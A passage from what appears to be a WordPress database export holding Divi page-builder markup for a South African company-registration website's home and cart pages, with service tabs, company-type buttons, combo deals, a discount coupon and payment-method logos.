#184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.22.3\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\"][et_pb_row custom_padding=\"29px|0px|0px|0px\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|15px|0px|14px|false|false\" custom_margin=\"|||\" make_equal=\"on\" _builder_version=\"3.25\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Private Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.24\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.23.3\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|700|||||||\" button_icon=\"%%144%%\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"28px|0px|4px|0px\" _builder_version=\"3.25\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_4,1_4\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Product page\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.11)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"73%\" background_color_gradient_end_position=\"99%\" box_shadow_style=\"preset2\" custom_padding=\"6px|0px|22px|0px|false|false\"][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"30px|0px|14px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.2.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"color: #0c71c3; font-family: inherit; font-weight: normal;\"><strong>Most Popular<br /></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\">Customise your requirement and SAVE</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" custom_padding=\"20px|20px||20px\" custom_margin=\"||20px|\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.23.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" url_new_window=\"on\" image=\"https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.26.3\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" transform_translate=\"84px|-67px\" transform_rotate=\"0deg|0deg|10deg\" transform_skew=\"-3deg|-3deg\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"slide\" animation_duration=\"1100ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">If we don\'t deliver within a reasonable time you may cancel at anytime.</span></p>\n<p><span style=\"color: #000000;\">NB: The CIPC and SARS may exceed their delivery times</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\"][et_pb_row custom_padding=\"0|0px|12px|0px|false|false\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" custom_padding=\"0px|0px|38px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','publish','closed','closed','','shop','','','2019-07-25 12:47:14','2019-07-25 10:47:14','',0,'https://companyregistration.online/shop/',0,'page','',0),(5,1,'2016-03-11 22:00:07','2016-03-11 20:00:07','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"3.22.3\"][et_pb_row admin_label=\"row\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Text\" _builder_version=\"3.26.3\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||0px||false|false\" custom_margin=\"||-50px||false|false\"][woocommerce_cart][/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.3\" min_height=\"263px\" custom_margin=\"-80px||||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.24.1\" text_font=\"||||||||\" header_font=\"|700|||||||\"]<h1 style=\"text-align: center;\">Payment Methods We Accept</h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" custom_padding=\"0px|50px|0px|50px||\" custom_margin=\"1px|-16px||-16px||\" _builder_version=\"3.25\" width=\"100%\" max_width=\"1087px\" module_alignment=\"center\" column_structure=\"1_6,1_6,1_6,1_6,1_6,1_6\"][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"|0px||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/Maestro.png\" _builder_version=\"3.24.1\" transform_scale=\"58%|58%\" custom_margin=\"18px||\" custom_padding=\"||19px|||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"0px|0px||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/Instant-EFT-by-Payfast.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/SCode-logo-horizontal.jpg\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\" custom_padding=\"17px||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_6\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/bitcoin.png\" _builder_version=\"3.24.1\" transform_scale=\"60%|60%\"][/et_pb_image][et_pb_image 